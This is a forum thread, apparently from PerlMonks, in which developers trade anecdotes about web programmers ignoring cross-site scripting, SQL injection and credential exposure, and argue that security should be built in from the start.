I was at a presentation of a local user group recently. I won't give more details than that to avoid embarassing the guilty parties. However, the presenter talked about an e-commerce application being developed for the web that he had spent a year developing, and was already in production. Some of the application involved doing a database query and showing the result on the web page. When I noticed no particular care being given to escaping HTML entities, I asked point blank "What considerations are you making to avoid cross-site scripting attacks?". His response made my jaw drop (after I stopped giggling): he went into detail about the security of the cookies being sent to the browser. All of which was cool, but was exactly the wrong place to look to avoid cross-site scripting attacks, where a user can place HTML displayed to another user, and thereby execute Javascript which steals cookies and therefore identities and everything that implies.

I'm shocked. Is this typical? Are people developing "web applications" without paying attention to Bugtraq and CERT notices, or even noticing that something they might be doing might be compromising their customer's security?

A few minutes later, I asked about cookie usage, wondering if the path of the cookie was being set properly, since he reported that sometimes you get "logged out" inconsistently. It took about six tries before he had a clue what I was asking.

And then he was talking about putting entire SQL queries into a cookie to provide paging access through the result set! As if by luck, he figured out that that "might be insecure", so instead he simply puts the parameters of the query into cookies!

Clues, people. Clues. These are all things that are basic security issues: the ignorance of which results in loss of revenue or privacy, possibly undetected.

As one person left the presentation, she commented quietly to me, "I like your brain." Which I'll presume to mean that I was asking the exactly right questions, and proved that this wasn't the guy that the rest of us should be learning from for strategy.

If you design for the web, remember that it's much better to have a non-functional secure site than a non-secure functional site.

A few years ago I might have said, "score, chalk one more for Common Sense Man", but you must remember (I must remember), Common Sense Man dispense Common Sense for a living.

That is excellent advice to remember, so here is even more advice, if you're "designing" things, make sure you don't do it alone. Very few people can cover all their bases and cover them well. If you're going to bother to even consider security (and you should), get a security consultant, whose sole purpose is to think of these things ~ someone like you (it helps if the guy keeping an eye on security is not merely a common sense guy who knows the workings of things, but can make them work too).

Also, and I know you know this, security is best implemented before anything's written (have the security guy attend the design meetings, mmkay).

And most importantly, if you're ever giving any kind of presentation, have somebody who is relatively an expert in what ever you're presenting, give you a review (how can you sell anything with your presentation, if you have someone in the audience giggling at your ignorance ~ heeey, here's a novel idea, bring your development team, and the security guy, to field these type questions, it'll save you from starving)

Heh. And the worst part is that the guy himself probably did not realize he was doing something wrong. I find it pretty strange that people can still miss those simple security measures, when just about every manual or tutorial for web programming mentions, in one way or the other, the security rule #1: "Do not trust what your visitors submit". Or for that matter trust your visitors at all. Even the most benevolent user might submit something harmful, and what about the malicious?

Personally, I try to make sure that nothing that is submitted goes unchecked, especially if it might be part of a SQL query, or has any chance of being displayed back in the browser.

That said, I once, about two-three years ago, saw a site that had SQL statements embedded in the HTML! More specifically, in VB-scripts on the pages. I have no real idea how that worked, or why it would be in the client-side VB code... it is altogether possible that it didn't work, but was just some strange copy/paste error. Then again, given the total integration and (at least earlier) lack of security compared to "features" in Microsofts systems... I know very little about VB/ASP etc, and at that time I knew nothing. :) That doesn't mean it wasn't the real queries (with logic around it), including table names, column names, and variables passed in etc, and that could have been disastrous for those guys. "Gee, I wonder if I can end this submit with a semi-colon and then..." - well, you know the drill. Sadly, I never remembered to save that URL. I'm pretty sure it didn't last long anyways, at least not in that form.

Good node, and hopefully food for thought that will help one or two sites out there be more secure. :)

You have moved into a dark place.
It is pitch black. You are likely to be eaten by a grue.

Agreed, clueless companies sometimes hire clueless people to write code that impacts the bottom line. These people don't do the extensive and continual learning that is required. One senior ASP guy I know is relatively cluefull but hates reading (eek!). People base their ideas on the things they can see and security is usually not one of them. This is related to the discussions of insecure cut-and-paste scripts on the net.

I've done code review and evangelism but it doesn't end. Once I was asked to review someone's work for the cross-site scripting vulnerability which is good news, but most people do not understand the concept of building in security from the start, as you probably know.

I've often thought PM should have a well-organized section on security. Something more than the "CGI programming" page. It could include skeleton code, CPAN module reviews, and writeups on the issues and security philosophy. Maybe it could have a security issues checklist for clients to ask programmers to answer.

I think most monks figure out their own security strategies which is okay, this is Perl, but rolling your own is not a good strategy if you can't write the unit test. So what if each of us have to absorb a hundred megabytes a year just to stay alert. But new programmers? They often don't know anything about engineering or accepted practices. Or, they cross over from their real discipline. There's perlsec but it doesn't cover everything. We should at least point them to a book or something, maybe yours..

If we are trying to increase the number of Perl programmers maybe we should start with security. Something organized would improve security on the web I think. Type "Security" into the search box, you get a good thread but just a short one, you know? Advanced programmers could benefit too. For example, login code for CGI::Application with versions using and not using Apache auth modules, for starters.

Not coming directly from a computer background, but enough interaction with it, it seems to me that security, or as someone else put it, "distrusting any user input", is not something typically taught in computer courses, or if it is, it's an afterthought to the rest of the course. True, this is usually not directly a language issue but more of a general programming design issue, but again, I've seen some CSE course listings that don't really have a design course at any point, only technology on top of technology. Even if you look at computer books, that security is not heavily emphasized (a quick memory flip through the ORA CGI mouse book doesn't bring any major security things in the early part of the book to mind, as one example,). In addition, as .NET and Java become more popular, with their 'sandbox' that too many ppl take security for granted, it's bound to continue to be as such. Thus, you get people like the above, or Matt's Script Archives, or other numerous examples.

Thus, IMO, this is something that needs to be fundamentally changed at the low-level of CSE-type programs as to encourage building design around security before any code is written, and to use the language to that advantage to follow insecure input. Perl's one of the few that has this feature with taint mode, but, by default, languages like C, C++, or Java lack it. Thus, it would take more work for those languages to adapt, but certainly not impossible.

-----------------------------------------------------
Dr. Michael K. Neylon - mneylon-pm@masemware.com
||
"You've left the lens cap of your mind on again, Pinky" - The Brain
"I can see my house from here!"It's not what you know, but knowing how to find it if you don't know that's important

Not only is security not layered in from the start, and it's not taught to folks, I think there is a set of developers who don't think it's as important as it is. This is probably due to lack of training, because I don't think folks want to do a bad job, if they KNOW they are doing a bad job.

I view CGI security like nutrition education related to health care in the US. If everyone were taught it and understood it, from the very beginning, many problems would be avoided.

I did a code review for a woman who built a formmail.pl like script. She accepted "to" addresses straight from submitted form elements with no "validity" checking (like making sure only certain addresses could be mailed to, or better yet, taking email addresses right off the page and integrating them into her app), making her script (which she distributes on her website, BTW) ripe for hijacking by spammers. When I pointed this out to her, her response was "No one is going to bother to figure it out. Besides, I want my scripts to be usable by average humans."

Her point being that security by obscurity was enough, and that "security" ne "usability". My reply back was if you're doing something, you should do it RIGHT, and not protecting your users is a BAD THING. At least give them the option to have a secure script. If someone is going to install a freakin' script, they can make a list of valid email addresses (or maybe they shouldn't be using CGI scripts. . .) Anyway, she wanted to work collaboratively on a project with me. . .I think I'll pass on this one.

Secrets and Lies : Digital Security in a Networked World
(ISBN ISBN 0471253111). Really gets into why security is a
process, not just a checkbox ("Yeah, we're using only SSL
so we don't need to worry about anything else.").

And it's fairly hefty, so it'll leave a good welt when
you clobber some with it after pointing out what sage kernel
of advice they've ignored. :)

One more clue, or lack thereof story. I stumbled upon this from some consulting/integration work I'm doing for a client.

My client outsources a major application from a company. The company provides an XML based API to do various management functions. You pass commands in a simple XML format via POST'ed forms.

Here's where the strangeness starts- You have to pass the admin username/password to access the management features, obviously.

Well, one of the ways they advocate interfacing with their API is to send an HTML page back to the client (the person at the web browser, in this case) with the form and data you want to POST (yes, with the admin username/password in it). The page has a javascript "onLoad()" handler that submits the form back into the API. This made my hair stand on end- this page with the admin info will be stored in the cache, and what if a user has javascript turned off (like if they were trying to hack the outsourced application?) I hope no one actually implements this- but I feel for people using languages without LWP, this would probably be the only easy way to do it.

I'm doing all the API work server-side with LWP::UserAgent because there's NO WAY IN HELL that I would send the admin username/password to the client. What the hell are they thinking? This app stores personal info about people (potentially CC numbers too). I pointed this out to them, and they said "We'll look into this. . ." I plan on following up with them soon, because I just can't let this one slip.

The outsourced app is actually pretty amazing, feature/function-wise, it just seems like there is a disconnect somewhere along the way. .

Maybe it would help if you had links to what people should be looking at so that your post is helpful to those not as enlightened as yourself. This way people might avoid your criticism in the future, or at least be told that they should have looked here first.

I'm shocked. Is this typical? Are people developing "web applications" without paying attention to Bugtraq and CERT notices, or even noticing that something they might be doing might be compromising their customer's security?

I wouldn't be surprised if it was typical. Heck even Microsoft only recently took a month's vacation from writing code to beef up software security.

My view is that security really is a full-time position. There are just too many exploits going on for the average person to keep track of. No wonder people ignore security concerns or are ignorant of them.

As funny as ignorance is, I'm more interested in the solution you gave him. If you could post the example code you showed him or a link to the resource you pointed him to I'm sure we'd all be able to learn from it.

Are people developing "web applications" without paying attention to Bugtraq and CERT notices

In most cases they probably are, but that's a very small part of the problem. Aside from an occasional PHP vulnerability or the like, CERT and Bugtraq don't really apply that much to people who are in charge of only developing small web apps. Good programing practices that lead to more secure code are more important than reading every post to Bugtraq in these cases. Of course it's an entirely different story if they're paying you to set up their servers or do a security audit.

If you design for the web, remember that it's much better to have a non-functional secure site than a non-secure functional site.

Security is not an all or nothing issue. It is often necessary to reduce security in favour of usability (if you disagree, consider how you got to this site :). However, the example you give introduces vulnerabilities needlessly but this is still important to keep in mind.

And finally, to add a bit more educational value to this thread, here are few relevant links:

Unfortunately, security is rarely considered a part of the functionality of the software, and therefore almost never makes it (easily) onto the objectives list for a project. Almost every project I have been involved in, I have had to fight to get the security issue on the table.

IMO the issue of security has been left out of the training of most IT and business people from the college level through to the license and professional training courses. Many of the projects I have worked on have been driven by business units needs and wants. They were almost always unwilling to talk about security.

A serious issue in workplace management and recognition has to do with the weighting of "visible" code vs "non-visible" or "negative user experience" code. Many times programmers (in places I have worked) are recognized for the end-user fucntionality they create that contributes to productivity on a daily basis. Most security development detracts from the volume of the "visible" kicked out, and/or adds to the "negative user exeprience". The promotions I have seen handed out have not been to individuals who care about security, but rather care almost exclusively about the high "visible" code. Is it fiscally worth it to the average developer (who is normally on to the next position before 3 years are up) to spend extra time building in transparent or potentially user-impeding code for security, or to pump more "high visible" productivity warez that get them the faster promotions and the better pay, position and relations?

Security runs into the same issues as administration. You are not visible and normally not given much of a budget until the fire burns bright. Then, it may be your job.

The hard part I have seen has been the selling of business people and developers on the concepts of building a sound piece of software that can handle things not expected, providing a better path for growth, security and reusability. Maybe the issue has more to do with our consumption market mentality. We tend to burn right through resources (time/energy/money/etc) without really thinking about the long term affects of what we do. We want it now, and keep applying tape in flight.

Any good, though not necessarily experienced, programmer
will know their own level of incompetance. I've been
programming for a long time, but I know I'm dangerous
when I'm writing production code in a new area I'm
inexperienced in. I'm especially dangerous if I don't
have any emotion of fear since I think I'm doing fine
even though I'm probably heading for the abyss. As others have
mentioned,
design/code reviews are a must to keep me honest.

Security is like error checking,
you must build it into the design from the start and
the quality/quantity of it must be in direct proportion
to the damage that can be caused if you don't get it
right. If it's some silly little app you are running
on your machine from home, who cares if it gets hacked.
If you are taking
a CC number think "testify", "jail time", "bankruptcy" (esp. if
it happens to be mine :-).

When putting a smiley right before a closing parenthesis, do you:

Use two parentheses: (Like this: :) )
Use one parenthesis: (Like this: :)
Reverse direction of the smiley: (Like this: (: )
Use angle/square brackets instead of parentheses
Use C-style commenting to set the smiley off from the closing parenthesis
Make the smiley a dunce: (:>
I disapprove of emoticons
Other